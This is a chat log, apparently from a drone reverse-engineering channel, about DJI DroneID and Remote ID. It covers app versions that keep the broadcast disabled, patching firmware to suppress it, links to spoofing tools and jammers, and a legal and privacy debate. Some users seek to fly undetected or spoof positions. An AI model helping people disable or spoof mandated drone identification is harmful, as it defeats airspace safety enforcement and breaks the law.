[2023-05-17 14:59:51] pingspike : has anyone tried to enable Drone ID in countries where it's disabled by default? (eg. UK)

[2023-05-18 05:31:15] enk2022 : which dji ocusync drone has a serial number starting with 68?

[2023-05-18 11:44:46] sparkyws : I have managed to activate it in the U/K on a Mini 3 Pro by using fake GPS. It's a bit hit and miss but once enabled stays active for sometime (not sure why) but I need to some more testing I did it so I can test RID receivers and apps

[2023-05-18 16:54:09] tmbinc : btw does RID have encryption? I was glancing over mini 2 code recently that added RID and they do some random crypto

[2023-05-18 16:54:22] tmbinc : ... and is japanese RID the same as global RID?

[2023-05-18 19:05:40] dkovar : RID in the U.S. is not encrypted by design.

[2023-05-19 02:14:35] nmikus : I think the Japanese version has some signature thing in it

[2023-05-19 16:17:23] the_lord : Mini 3

[2023-05-21 07:12:05] joelg : what version of litchi can i use to keep remote id disabled

[2023-05-21 10:39:46] asdrubale : release 4.25 x android remain disable.....with 4.26 drone-id will be visible

[2023-05-21 21:32:50] joelg : Thanks anyone have the apk ?

[2023-05-22 05:14:14] oakley75 : I've got 4.19beta as my personal last one before 4.26. Extracted from my own install. I'll update if I find something newer.

[2023-05-22 11:44:43] joelg : I found 4.25 on a sus looking website but seems to be alright

[2023-05-22 12:31:35] oakley75 : Have you looked at it on a rooted phone/emulator using something like Permission Manager X, to see if any (bad) permissions were added?

[2023-05-22 13:19:34] coldflake : @joelg If your impression of the website is that it is sus, then stay with that and dont install that app. Without having the original APK to do a md5 comparison on, you can not even remotely tell if it is alright or not. Those who make sus websites, need people to think it is ok even though it screams to heavens that it is not ;)

[2023-05-22 14:21:59] oakley75 : I have far more older versions than of recent, but here are my latest Litchi. Extracted from official install. I don't think obb should be an issue, but phone was not rooted when these were extracted. 4.26_beta is included here in the slim case that the beta may still be ID safe. 30 days before the uploads delete. Litchi v4.19.0_BETA-g (77.2MB) MD5: 9433ae3ab6409053a38fb1e1718d15c0 https://ufile.io/eypvrd91 Litchi v4.26.0_BETA-g (62.0MB) MD5: 0bcfbbffc2c4145967cc71e710e209c1 https://ufile.io/tem3plib

[2023-05-23 11:30:51] joelg : Phone is just an old Samsung I don’t care about and the website was called happymod I have been hesitant to use it with the drone

[2023-05-23 11:31:29] joelg : Thanks I will give those a try

[2023-05-23 11:36:00] joelg : Looks like a need v4.20 or higher to be compatible with my Air2s so I’ll try 4.26 and see if it resets drone id

[2023-05-23 12:42:30] nz-maori : It will do so

[2023-05-23 21:04:04] iz_zi : iz_zi joined the channel.

[2023-05-27 05:21:40] drmsucks : drmsucks joined the channel.

[2023-05-27 14:16:45] lishujian3 : lishujian3 joined the channel.

[2023-05-30 10:00:41] qgig : qgig joined the channel.

[2023-05-31 22:14:03] nicksapienza : nicksapienza joined the channel.

[2023-06-01 06:35:11] cloudwerx : here is Litchi 4.25, right from Litchi, https://flylitchi.com/apks/30004310.apk

[2023-06-01 15:20:28] oakley75 : Funny, bought my license back when it was like 8 bucks for a P2V+, and never knew that he hosted these, thanks a million. Know how we could access the apk directory directly and look around? edit: I see the 4.25 link in the Litchi forum, awesome find! Frankly didn't know there was a specific Amazon Store version, weird.

[2023-06-01 15:20:28] oakley75 : Funny, bought my license back when it was like 8 bucks for a P2V+, and never knew that he hosted these, thanks a million. Know how we could access the apk directory directly and look around?

[2023-06-01 23:55:13] cloudwerx : yep that's where I found it, got lucky! I tried a few methods to figure out if I could get the other ones, but no luck yet, but have another idea I will be trying in a bit.

[2023-06-02 02:24:45] oakley75 : Well I can say for certain that 4.26 is 30004360, and we know 4.25 is 30004310. Number went up by 50 between a minor revision.

[2023-06-05 19:47:41] tolma4 : tolma4 joined the channel.

[2023-06-05 21:16:09] alt.nq-5711k93 : Hello, has anyone already tried to patch latest version of DJI Fly app to avoid DroneId reset ?

[2023-06-05 22:14:56] uskve : You would need to unpack it first

[2023-06-05 22:25:46] cloudwerx : https://www.dhgate.com/product/portable-counter-drone-device-for-stopping/803315894.html?d1_page_num=1&dspm=pcen.sp.list.4.eSKHOmxvCv7S3Go1zel3&resource_id=803315894&scm_id=search.LIST..@.prerank001|3|0|esm2|7_5|ER-B|newes|7_5.newC.#s1-2-1;searl|2441391829:3

[2023-06-05 22:26:26] cloudwerx :

[2023-06-05 22:26:45] cloudwerx : not bad for 100,000$

[2023-06-05 22:27:03] cloudwerx : bet you could do some other fun shit with that thing

[2023-06-06 00:16:31] alt.nq-5711k93 : Yes I saw, secneo protection, it's gonna be fun !

[2023-06-06 01:05:26] stanlee : Here's one for $29k:.. But wait! If you buy 5 or more each one drops to $28k!

[2023-06-06 01:05:27] stanlee : https://www.dhgate.com/product/portable-jam-ming-and-blo-cking-uav-drone/812330365.html?dspm=pcen.pd.alsobuy.3.z1Jxe8Ay3rVkDTPIbvPc&resource_id=812330365&scm_id=rec.yml..._pcpdymlcppd_1to2_related_pcpdymlcppd_fm-jfy-filter_2001_null_greenScreenFlag_0.31880001938460734.#pcpdymlcppd-3-5|null::r6129471023

[2023-06-06 15:15:43] benoit : benoit joined the channel.

[2023-06-07 07:39:46] jcase : i have both unpacked and patched it, but not for drroneid reset, patching the modem itself is a better route.

[2023-06-07 10:02:53] sappy : sappy joined the channel.

[2023-06-07 21:00:54] alt.nq-5711k93 : why not remove (or "nop") the part where it is sent to the drone ?

[2023-06-07 21:00:54] alt.nq-5711k93 : why not remove (or "nop") the part where the droneid reset to 1 is sent to the drone ?

[2023-06-07 21:06:55] alt.nq-5711k93 : On Mini2, using CIAJeepdoors to set droneid to 00000000 at the beginning of each test : - using an old version (<=1.5.10) droneid isn't modified (always set to 00000000), but if you go to the Aeroscope menu and deactivate all options you get droneid set to 01011111 - using a recent version, droneid is modified

[2023-06-08 07:50:24] the_lord : In 2019 it was less than 10K USD

[2023-06-08 10:18:19] jcase : you still have to unpack it before you can nop anything

[2023-06-08 10:18:34] jcase : CIAjeepdoors is an incomplete solution and should not be relied on

[2023-06-08 17:12:09] konraditurbe : Do you mean incomplete solution because it still broadcasts a signal (but with Null data)?

[2023-06-08 21:37:44] jcase : that and because it does not alwayhs cause it to broadcast with null data on certain firmwares/drones

[2023-06-08 21:38:15] jcase : one example, some P4 firmwares will spuratically ignore teh privacy bits and broadcast complete data

[2023-06-08 21:39:05] jcase : i did not track down the bug that caused that, nor did i verify what al lfirmwares or devices are impacted, its a DJI bug for sure and wasnt what i was researching

[2023-06-08 21:39:11] jcase : buti did verify it

[2023-06-09 06:59:21] tmbinc : So you're rather ripping out the drone ID handler in the modem firmware?

[2023-06-09 10:47:18] jcase : depends on drone model, but yes some via modem. Some via other parts of firmware. Im unaware of any other method that actually works

[2023-06-09 17:04:24] bitbangingbytes : Have any other detailed photos posted anywhere?

[2023-06-10 07:59:19] the_lord : I took several photos for the jamming modules and the antenna when I disassembled it

[2023-06-10 22:49:15] blablabrscht : blablabrscht joined the channel.

[2023-06-12 02:24:29] bitbangingbytes : Can you share them! I have a Reverse Engineering wiki, would be cool to post them there. wiki.recessim.com

[2023-06-12 02:24:29] bitbangingbytes : Can you share them? I have a Reverse Engineering wiki, would be cool to post them there. wiki.recessim.com

[2023-06-12 23:22:26] fredmicrowave : Looks like a Dual Ridged antenna

[2023-06-18 14:17:06] tstotch : tstotch joined the channel.

[2023-06-19 23:26:03] martymcfly : martymcfly joined the channel.

[2023-06-20 07:39:13] the_lord : These are all the pictures I could find

[2023-06-21 11:29:43] the_lord : anyone has the Aeroscope mobile crystal sky FW update file?

[2023-06-21 12:30:10] tissy : The FW to enable the mapping API again?

[2023-06-21 12:36:20] jcase : lol yeah they stopped paying their mapbox bill

[2023-06-21 12:36:25] jcase : switched to maptiler

[2023-06-21 12:36:35] jcase : its even better, they are caching the tiles on their own server

[2023-06-21 12:36:41] jcase : so they can see what map you are looking at now

[2023-06-21 12:36:48] jcase : well, at least in DJI fly

[2023-06-21 12:37:04] jcase : i havent unpacked the newest AS apk

[2023-06-21 13:29:51] the_lord : yes indeed

[2023-06-21 13:31:14] the_lord : its a customer's AS and I need to solve his problem

[2023-06-21 13:37:10] dkovar : I have it, somewhere. Let me find it for you.

[2023-06-21 13:41:24] the_lord : appreciated, thanks :)

[2023-06-21 13:41:41] the_lord : as you know I don't need it for myself ;)

[2023-06-21 19:46:12] tissy : Did you get the file @the_lord , if not I have it here.

[2023-06-21 21:29:26] the_lord : Send it please

[2023-06-22 12:01:51] sparkyws : RID spoofing ? https://github.com/jjshoots/RemoteIDSpoofer

[2023-06-22 20:21:29] vladho : vladho joined the channel.

[2023-06-25 16:35:48] tstotch : Can that help with privacy and staying undetected when flying on your own?

[2023-06-25 18:32:44] konraditurbe : Is there a law against fake RID emissions? Just make so many your drone looks like one of them in Aeroscope screen.

[2023-06-25 19:47:29] tstotch : Aeroscope itself is being canceled anyway because of the new RID standard

[2023-06-25 23:08:52] jcase : @konraditurbe yes it is in the US

[2023-06-25 23:09:09] jcase : @tstotch it is not cancelled, in fact new hardware is in beta testing now

[2023-06-25 23:09:29] jcase : and there is no way to fly a drone remotey while being undetected

[2023-06-25 23:13:18] jcase : They seem to keep flip flopping, but latest signs show they are not done

[2023-06-25 23:13:38] jcase : Remote id and drone is serve two different purposes which you can see in the design

[2023-06-26 15:19:52] tstotch : https://www.theverge.com/2023/3/5/23626057/dji-discontinues-aeroscope-drone-detecting-system https://www.skylock1.com/blog/how-will-the-discontinuation-of-djis-aeroscope-system-impact-airport-security/ https://petapixel.com/2023/03/06/aeroscope-discontinued-dji-pulls-the-plug-its-drone-detection-system/ it very much is discontinued

[2023-06-26 17:14:43] jcase : @tstotch after the publication of all 3 of those articles DJI has a) shipped firmware supporting an AS hw upgrade, b) shipped beta testers that hardware, and c) I've managed to acquire a new order of units. I'm quite confident that it is not fully discontinued.

[2023-06-26 17:14:43] jcase : @tstotch after the publication of all 3 of those articles DJI has a) shipped firmware supporting an AS hw upgrade, b) shipped beta testers that hardware, and c) approved a purchase order for us of new AS units ... I think those articles are wrong

[2023-06-26 17:14:43] jcase : @tstotch after the publication of all 3 of those articles DJI has a) shipped firmware supporting an AS hw upgrade, b) shipped beta testers that hardware. I'm quite confident that it is not fully discontinued.

[2023-06-26 17:15:46] jcase : They have made it quite difficult to buy right now, and I'm told that is related to the war in ukraine.

[2023-06-26 17:18:29] jcase : Their former attorney's assessment is moronic, FFA Remote ID is irrelevant, purpose of RID is close notification, purpose of AS is distant notification. Until FAA approves a long range protocol, its not going to replace AS at all.

[2023-06-26 17:45:25] dkovar : Remote ID is also not secure and can be spoofed, making it hard for defenders to depend on.

[2023-06-26 18:29:36] konraditurbe : Well... https://github.com/DJISDKUser/ESP8266_DJI_DroneID_Throwie

[2023-06-26 19:15:57] jcase : and the AS will tell you it is eing broadcasted over wifi. ESP based spoofs are mostly identifiyable, and short range

[2023-06-26 19:16:26] jcase : drone id is pretty trivial to spoof on wifi as well, my main gripe on remote id is that it is short range

[2023-06-26 19:34:13] tstotch : which is exactly what I'm counting on

[2023-06-26 19:37:59] tstotch : has anyone tried spoofing on a mini 3 yet?

[2023-06-26 19:44:44] jcase : spoof on a drone? or spoofing the drone?

[2023-06-26 19:45:02] jcase : and im not sure why you would want to spoof off the drone itself?

[2023-06-27 03:29:35] harryyy : harryyy joined the channel.

[2023-06-27 08:04:49] rachfly : Do you have any published information on that matter? how are you so sure? thanks

[2023-06-27 08:51:07] konraditurbe : https://www.faa.gov/uas/getting_started/remote_id

[2023-06-27 11:42:59] rachfly : I'm sorry, my previous question in a comment was supposed to be for these claims. do you have any link to published information about it? Thanks. Any info about new Aeroscope ?

[2023-06-27 18:12:26] jcase : @amirach for a) yes, they published the newest firmware, which contains the support for a new hw upgrade, for b) im unable to share anything on

[2023-06-28 03:40:18] bitbangingbytes : Funny, when I asked the DJI sales people internally they said multiple times AS was going away and there was no replacement. Also said they eliminated the product mangers working on AS.

[2023-06-28 03:41:33] bitbangingbytes : But they seem to be an organizational shit-show so wouldn't be surprised if they released a V2 AS

[2023-06-28 09:44:45] jcase : there was speak of a v2, i question if this update eliminates v2

[2023-06-28 10:06:33] konraditurbe : What's the point of FAA RID (1km range) if AS still has to exist? Did FAA just make it so people could rat out a drone they saw to nearby police? Don't get it, thought the law would just be 1km range and not more.

[2023-06-28 11:29:15] jcase : there are near infinate safety reasons for something like RID. RID exists as an open standard, and mandated for most drone companies. DJI owns AS and would either deny usage of it, or require licensing

[2023-06-28 12:02:29] tstotch : RID and AS themselves are very much a good thing for safety reasons

[2023-06-28 12:02:50] tstotch : the problem is when it's abused to needlessly restrict people who are no danger to anyone anyway

[2023-06-28 14:29:42] tissy : Is the firmware update just for the CrystalSky @jcase or the SDR too?

[2023-06-28 15:57:15] jcase : How does the existence restrict anyone? They are non restrictive technologies.

[2023-06-29 11:07:04] dkovar : RID and DroneID limit some people's ability to fly without being observed. They are perceived as infringing on their privacy or liberties.

[2023-06-29 11:08:44] dkovar : ID and DroneID limit some people's ability to fly without being observed. They are perceived as infringing on their privacy or liberties.

[2023-06-29 11:20:43] tmbinc : In most jurisdictions, the concept of using airspace, even above your own grounds, without regulation does not exist. So to be clear - are we talking about places where airspace is really unregulated, or about places where airspace is regulated but people just wish it wouldn't be? In the latter case, that seems to be an issue that should be fixed on the political/legal side first, otherwise the argument boils down to "I want to break the law but don't want to get caught". Yes, there are privacy implications of regulating airspace, and if you're unhappy with the tradeoff, it seems the right course of action would be to lobby for a law change.

[2023-06-29 11:21:31] tmbinc : I think there's a huge difference between "I want to do something that DJI doesn't allow me to do" vs. "I want to do something that I'm legally not allowed to do". I'm very happy to help with the first (because fighting large corporations etc.), but not very happy with the second.

[2023-06-29 11:45:05] dkovar : The entire National Airspace (NAS) is regulated. There are certainly people who want to break the law and not get caught. I think we generally aren't hearing from them. Then there are those who think the regulations are stupid or invasive. They probably aren't violating the law or regulations and, because they are compliant, should not be subject to surveillance. I understand this point of view but feel that the NAS cannot operate on "Trust me, I'm not doing anything clueless, careless, or criminal." We'd have an easier time making the argument for RID if the data was only available to people with a legal interest in the location of the drone and operator. Since anyone using a mobile phone app can potentially identify the operator's location RID does feel like an invasion of privacy as implemented.

[2023-06-29 11:49:05] joonas : if the law requires surveillance how are they being compliant when they are trying to avoid said surveillance? it's a "i know there's a requirement, but trust me bro, i fly safe so i should be exempt" situation in reverse.

[2023-06-29 11:50:25] joonas : not saying the laws are sane or the people who write them are particularly smart. but tmbincs point stands - these people should be pestering their lawmakers, not asking people to help them break laws because "trust me bro. and the law is stupid anyway".

[2023-06-29 11:51:38] joonas : of course sometimes hackers also do deal with "the law is stupid" situations. but i think it's only fair to ask that others respect any boundaries people are setting there.

[2023-06-29 12:20:04] dkovar : Oh, I agree with you both - should go talk to their law makers. But speaking as someone who was somewhat involved in the RID process and who works with the US government, your average civilian has zero chances of fixing the laws. RID is really badly implemented. I fear that abuse of RID data will result in legal challenges that could shut it down. Replacing it with something better designed would take years.

[2023-06-29 16:37:16] bitbangingbytes : What's badly implemented about RID?

[2023-06-29 16:37:16] bitbangingbytes : What's badly implemented about FID?

[2023-06-29 17:19:58] dkovar : This is what I wrote up for a LinkedIn post a few weeks ago: "Remote ID is fundamentally, perhaps fatally, flawed. Confidentiality, integrity and availability - the CIA Triad - Remote ID doesn't require any of these. <insert image of guy at table in a park with sign that says "Prove me wrong".> The CIA Triad is a foundational model for information security that is taught to everyone involved that learns about infosec. Confidentiality - everything is broadcast in the clear over the air. Legitimate operators will be confronted by members of the public that feel that their legal operations are in some way illegal or offensive. Integrity - there is no authentication mechanism, anyone can fill the fields with whatever data they wish. It can and will be spoofed, causing operators, the public, and LE to not trust the system. Availability - it uses Bluetooth, transmission hardware and software lacking requirements, and depends on whatever Bluetooth implementation and platform the receiver possesses. If there is something wrong with the Bluetooth on an officer's phone, they'll perceive that a drone is not broadcasting when it might actually be complying. We may have a very expensive roll out, a discovery that the requirements and implementation are flawed, failures to investigate and prosecute non-compliant operators, and once again be years behind a system for reliably identifying UAVs operating in the NAS."

[2023-06-29 19:24:04] quad_fan : To be complete: it's not accurate to say it uses Bluetooth. Implementation can be BT OR WiFi (via Beacon or NaN) - manufacturer's choice.

[2023-06-29 21:19:15] tmbinc : Stupid question maybe, but: Is RID purely sent by the UAV or by the Pilot's equipment? Cause I'm seeing code that forwards RID packets to the ground station ("vt_gnd") but it's possible I'm misunderstanding the code.

[2023-06-29 21:37:00] dkovar : Purely by the UAV but I can see why a vendor might send the same information to the ground station. And there was a proposed version that would require the ground station to transmit the information rather than the drone, so maybe that is legacy code? Interesting.

[2023-06-30 11:28:00] jcase : I think they arye flaw but not in the way of privacy

[2023-06-30 11:28:11] jcase : i mean RID has a very short range

[2023-06-30 11:28:25] jcase : and none of them are really pushing confidential info

[2023-06-30 14:47:48] tstotch : I was referring to cases like "I wanna cruise in my own backyard/garden and house" or "it's a great morning in the park and no one is around, i wanna record myself skating" or "the skyline looks nice with this sunset, let's just quickly climb to 20m for a shot and get down again"

[2023-06-30 14:48:53] tstotch : not cases like "oh, looks like my ex got her window open again. time to take a peek!" or "lol, think I'll go fly to the supermarket 2km away from my home and cruise around above the street there"

[2023-06-30 14:50:29] tstotch : the law doesn't differentiate there in my country. Any kind of flying in cities is criminalized unless you have explicit written permission from the local government. Which you only get if you work in a job that makes use of a camera drone

[2023-06-30 14:52:18] tstotch : put another way: in the eyes of the law, you wanting to cruise around in your own garden a little is put on the exact same level of crime as your idiot coworker who flies his drone around a train station or a hospital

[2023-06-30 14:57:07] tstotch : and let's be real here: if you really want to screw around people or whatever, you don't need to buy a DJI drone for 600-1000€. You buy a Cetus Pro kit for 300€ and go with that. Also has a camera through which you can see stuff

[2023-06-30 14:57:48] tstotch : in fact, if your goal is to screw around and be an idiot, a Mavic or Mini would be far too expensive for the risk of having it taken away

[2023-06-30 15:04:02] tstotch : that's still a very legitimate fact and desire. I fail to understand how people can genuinely question the basic and simple wish for privacy and associate it with the desire to break the law

[2023-06-30 15:04:58] tstotch : no one needs a special reason to wish for privacy. "none of your business" is reason enough

[2023-06-30 15:10:40] tstotch : anyway, it sounds like RID is too unreliable and flawed to be of any real concern for pilots that want to stay safe from salty cops trying to find an excuse for executing their authority (even if strictly speaking legally right). But I still couldn't find any info on a successor to Aeroscope. Only that because RID is coming, DJI decided to cancel Aeroscope so they could follow suit with the new, unified tracking standard

[2023-06-30 16:55:54] remotelyidentified : remotelyidentified joined the channel.

[2023-06-30 17:14:05] remotelyidentified : Airspace is a property of the commons, and needing some kind of identification to use these properties is fairly well established worldwide. License plates are the obvious and perfect analogy: in exchange for getting to use the road, you give up a little bit of your freedom and privacy. I find it funny that those who are most opposed to ID tech are those who could benefit from it the most - in countries which have banned drone use due to fear, Remote ID is a great tool for calming the mind of lawmakers and allowing more freedom to fly. It literally gives people the ability to distinguish those flying in their garden from those terrorizing a sporting event. As for the technical implementation of Remote ID: It has obvious flaws, but once you start thinking about them, how could they be fixed? If messages are to be authenticated or encrypted, you have the classic "how do you give key material to random global vendors and have it not leak in 5 minutes" problem. Nobody has solved this problem - if you look at Windows driver signing keys, CarPlay / Android Auto, Made for iPhone, etc, it's all broken. And if you start thinking about encrypting the data, things get even worse. Now you have a centralized enforced monopoly on drone detection / airspace management held by whoever manages the trust root and issues keys. I actually think that Remote ID is probably the best solution we could have gotten as far as the possibilities go. It's basically like a flying license plate: it's relatively short-ranged, it's a public ID which only registration authorities can link to a private identity, it's easy for anyone to inspect and understand exactly what's being sent. It's massively prone to spoofing, but any anti-spoofing solution I can think of is both technically implausible and ultimately worse as it would build false trust in the system (see, again, driver signing for a great analogy here... when the keys leak it's a disaster). Yes, Remote ID could be turned into a panopticon pattern of life monitoring system if drones were your pattern of life, I suppose, but certainly no worse than a license plate. I agree that dragnet data-aggregation services should probably be limited (see Flock in the US for example... gross...), but that's sort of an orthogonal problem created by technology - someone with a massive collection of RF sensors could also just track your phone and gain much more useful information about you as a person than a drone. What we got seems pretty reasonable to me, and 1000x better than the Mainland China solution and the first Remote ID draft, with always-on mandatory Internet based flight reporting to a central government agency.

[2023-06-30 18:41:52] tstotch : the short range is something I'm happy about too, even if it means that some cranky old fart will be able to spot and report you having fun by yourself far away from populated areas without disturbing anybody. It's better than Aeroscope's 48(?)km range scanners where you can get spotted and reported for endangering the airport's traffic while you are 40km away from the airport using your Mini 3 to knock old soup cans off a table in your garden...

[2023-06-30 19:12:29] quad808 : To me, the issue is simple. Digital license plate? Fine. No problem, as LONG AS only law enforcement can get the info if they are authorized to enforce regulations. Citizens should not be able to track you down after being able to see...where your drone is, where it took off from etc. Thats just asking for trouble for a host of scenarios.

[2023-06-30 20:15:34] tstotch : complete agree on that. And even law enforcement should only be allowed to intervene if there is legitimate and immediate concern for danger. Such as you flying over a school, a hospital, police station or similar. Due to RID being short range, this would easily be visible with the naked eye too

[2023-06-30 20:17:30] tstotch : but civillians should never, under any circumstances, have access to any kind of data your drone transmits. Regardless which it is. It's simply none of their business what you do with an item that you own yourself. Something nobody but yourself has their hands over

[2023-06-30 20:19:41] tstotch : but enforcing the law becomes a huge mess when you are in a country like Germany, where you have two or three different sets of airspace laws entangled with each other. Plus cities being able to designate their own restrictions separate from that

[2023-06-30 20:21:02] tstotch : So even if your flying is totally fine and legal according to EU law, it can still be illegal according to whatever local law your country, state or city has. Even if EU law should technically stand above those

[2023-07-01 12:05:17] jcase : You all do realize that remote id/ drone id isnt needed to get pretty much the same information ri ght?

[2023-07-01 12:05:27] jcase : at least much of it

[2023-07-06 11:40:32] vagr4nt : vagr4nt joined the channel.

[2023-07-06 15:57:07] sp4rk : sp4rk joined the channel.

[2023-07-06 17:32:41] joonas : yeah apologies, i was clearly mistaken on the actual origins of JD. the readme update is probably good anyway. normies google "disable drone id", one thing leads to another... arguments ensue.

[2023-07-06 17:32:41] joonas : yeah apologies, i was clearly mistaken on the actual origins of JD. the readme update is probably good anyway. normies googles "disable drone id", one thing leads to another... arguments ensue.

[2023-07-06 18:00:51] tstotch : yeah, same happened to me and videos about that script explaining how it "disables" DID when it in reality does not don't help either. But with AS being discontinued and RID apparently so easy to mess with, JD isn't needed anymore either really

[2023-07-06 18:03:02] tstotch : I literally googled "how to disable droneid" and that led me to a video which then pointed towards jeep

[2023-07-06 18:07:46] tstotch : First thing I asked when getting in touch with one of the devs some months ago was actually if there's any risk of failure from the script or that the signal might otherwise get through even with the script active but I was redirected here instead

[2023-07-07 00:16:59] funbob : funbob joined the channel.

[2023-07-07 20:09:46] heathcliff : heathcliff joined the channel.

[2023-07-09 03:05:11] tstotch : https://www.youtube.com/watch?v=Q8jn_6EmYxE JB providing instructions on how to mess with RID

[2023-07-09 12:48:17] bitbangingbytes : Attach that to your drone and you're instantly a swarm ?

[2023-07-09 15:50:35] tstotch : yep. To be honest, that's one reason I'm doubting the usability of this. If you open your tracking app and you see a condensed spot of many drones in the middle of nowhere, you can easily tell it's a spoofer there

[2023-07-09 15:51:09] tstotch : So instead of hiding it in a swarm of drones, it would probably be better to just obfuscate the transmitted data, if possible

[2023-07-09 15:51:47] tstotch : or force it to transmit false data. Like the drone sitting on the ground a couple kilometers away

[2023-07-09 16:31:56] bitbangingbytes : Yea, spoof hovering around a busy park nearby or something that's hard to track down who it might be

[2023-07-14 02:41:18] joelg : Does anyone have the ipa for maven

[2023-07-14 14:31:11] oakley75 : Even much older models have the hardware capabilities to transmit. https://forum.dji.com/forum.php?mod=viewthread&tid=293343&extra=page%3D1%26filter%3Dtypeid%26typeid%3D815%26typeid%3D815

[2023-07-16 10:06:13] ct253 : ct253 joined the channel.

[2023-07-17 10:24:24] rachfly : what is the story with skydio?? do they work on a new drone? why can't you buy any of the drones? anyone has any information? 10x

[2023-07-17 11:14:03] jcase : I have some of their drones

[2023-07-17 11:14:22] jcase : i know a little about the internal workings of them but none of the company outside what info i got when i interviewed with them

[2023-07-17 11:29:19] joelg : Don’t know anything about apps but was looking thought the dji fly app with the jailbreak tweak flex and looking for anything remote Id related

[2023-07-17 11:29:44] joelg :

[2023-07-17 11:30:15] joelg : Trying to stop the app from resetting privacy bits

[2023-07-17 11:31:06] joelg : Gonna set everything to false see what happens

[2023-07-17 12:13:20] konraditurbe : There's a rumor floating around, spread by former DJI VP of Policy no less, that Skydio is out of the consumer/mass market.

[2023-07-20 22:39:47] karthor : karthor joined the channel.

[2023-07-24 02:44:49] dji-rev.concierge132 : dji-rev.concierge132 joined the channel.

[2023-07-24 19:27:42] joelg : If maven for iOS doesn’t reset privacy bits I’m guessing it’s because they used an older sdk doesn’t that mean that there should be an older version of litchi iOS that also doesn’t reset privacy bits?

[2023-07-24 21:56:08] dji-rev.concierge132 : @joelg dang good thing you mentioned it. I was using litchi thinking my aeroscope was disabled! the dang SDK re-enabled it.

[2023-07-25 10:37:59] jcase : changing privacy bits does not disable aeroscope.

[2023-07-25 12:45:38] dji-rev.concierge132 : well I mean it sends out 000s instead of actual information

[2023-07-25 12:45:38] dji-rev.concierge132 : well I mean it sends out 000s instead of actual information. I am ok with it transmitting if it's all zeros.

[2023-07-25 12:48:15] konraditurbe : Not always and only verifiedly observed this behavior on specific firmware versions, on specific app versions and on specific birds.

[2023-07-25 12:49:45] dji-rev.concierge132 : well I am using very old firmware on my mini 2 and old version of DJI fly. the one recommended by the jeepdoors

[2023-07-25 12:50:47] dji-rev.concierge132 : 01.03.0601

[2023-07-25 13:49:39] dji-rev.concierge132 : is there a cheap way to confirm what my drone is sending out to the world ? @konraditurbe

[2023-07-25 13:50:00] konraditurbe : No...

[2023-07-25 13:50:13] dji-rev.concierge132 : or should I just return it back to the store and forget about DJI. not gonna lie this aeroscope crap is a mood breaker

[2023-07-25 13:57:47] joonas : with both US and EU regulations coming in hard and fast you won't be able to purchase an off the shelf drone w/o RID at all soon. this is not just unique to DJI (although yes, they were ahead of the curve with aeroscope and yes they're CCP aligned. but that's besides the point).

[2023-07-25 13:57:47] joonas : with both US and EU regulations coming in hard and fast you won't be able to purchase an off the shelf drone w/o RID at all soon.

[2023-07-25 14:03:46] dji-rev.concierge132 : @joonas Is there anything on the market right now that is comparable to DJI mini 2 without all of this crap built-in or at least inactive at the moment? I am from canada so I am neither from US or EU.

[2023-07-25 14:08:03] joonas : something from autel probably? i couldn't say for sure, especially on the comparable to dji mini 2 front. that's sort of like asking for a macbook but not wanting it to be from apple...

[2023-07-25 14:08:37] joonas : you can probably get something with similar specs, but the experience is not going to be nearly as polished, that's for sure.

[2023-07-25 14:10:08] joonas : official US RID (wifi) packets you can actually pick up with an android/ios app presuming a new enough phone. but for dji's aeroscope "droneid" (their old method) you need an expensive sdr and lots of grunt work with processing scripts i'm afraid. or access to an aeroscope.

[2023-07-25 14:10:41] dji-rev.concierge132 : Do those drone have a hacking community similar to DJI ? @joonas. Also doesn't have to be necessarily like mini 2, but must be less than 250g and similar range. ~1k budget

[2023-07-25 14:10:59] joonas : i don't actually know for sure how droneid/remoteid behaves when the region is set to canada. it should have the wifi based RID off, but it might be broadcasting old aeroscope droneid signals then.

[2023-07-25 14:11:55] dji-rev.concierge132 : The droneid/remoteid app wan't picking up anything in my area.

[2023-07-25 14:12:04] joonas : hacking community around autel - afaik no.

[2023-07-25 14:12:09] dji-rev.concierge132 : gonna test with my own drone soon

[2023-07-25 14:12:33] dji-rev.concierge132 : that's a deal breaker.

[2023-07-25 14:12:52] joonas : yeah thing is it's likely turned off based on your region. but that doesn't tell us if the proprietary aeroscope method is off or on.

[2023-07-25 14:13:00] dji-rev.concierge132 : not that I even want to remove limits. I just want to own the stuff I bought and so it doesn't spy on me

[2023-07-25 14:13:00] dji-rev.concierge132 : not that I even want to remove limits. I just want to own the stuff I bought

[2023-07-25 14:39:43] konraditurbe : We will all go back to building our own quads with old FCs and whatnot soon or kiss this hobby goodbye.

[2023-07-25 14:47:24] joonas : yeeees, come over to the FPV dark side ;)

[2023-07-25 15:40:21] dji-rev.concierge132 : speaking of own quads. does DJI fpv camera module also have aeroscope crap in it ?

[2023-07-25 15:41:37] dji-rev.concierge132 : I really like the DJI video stream quality.

[2023-07-25 15:55:22] dkovar : Almost all drones in the U.S. will be required to broadcast information that you perceive as "spying on you". If you want quality products built by someone else, you'll need to accept RID. (Or disable it, which is illegal, but that is on you, I do not care.) So, if you want DJI video quality, you need to accept RID and "Aeroscope crap".

[2023-07-25 16:18:50] dji-rev.concierge132 : I am not from US though

[2023-07-25 16:19:24] dji-rev.concierge132 : until they introduce it here, I am sure it's a matter of time, I am not required to have a spying stuff on my drone

[2023-07-25 16:21:39] dji-rev.concierge132 : also from what I understand sub 250g drones are not required to have remoteid in US

[2023-07-25 16:27:15] dkovar : Correct. You are also not required to buy DJI. What is required for RID in the U.S. does not apply to you. The 250g exception is due to the fact that a) drones under 250g do not need to be registered and b) drones that do not need to be registered do not need RID. The question is - will DJI products that support RID that are sold in Canada have RID disabled?

[2023-07-25 17:15:18] joonas : they don't. neither the old air unit / vista series nor the new o3 air unit. this has been confirmed mulitple ways, including an aeroscope.

[2023-07-25 17:18:25] joonas : and it's important to note here that i don't expect them to ever add RID to the DIY systems. why? because there's no way to get such a system, which relies on an external fc providing gps coordinates, to be a compliant system. they need to be in control of the whole gps to broadcast chain, otherwise they can't submit it for compliance.

[2023-07-25 17:44:39] dji-rev.concierge132 : I've seen external modules being sold for RID. some replace GPS module so you can save weight and others are just stand alone modules that you can attach to your existing drones

[2023-07-25 17:47:32] dji-rev.concierge132 : That's good! I wanna build my own FPV drone with this module in it. The only part I don't like is having to always use goggles for it. Wish there was an receiver that just plugs into phone or tablet that appears as an otg webcam.

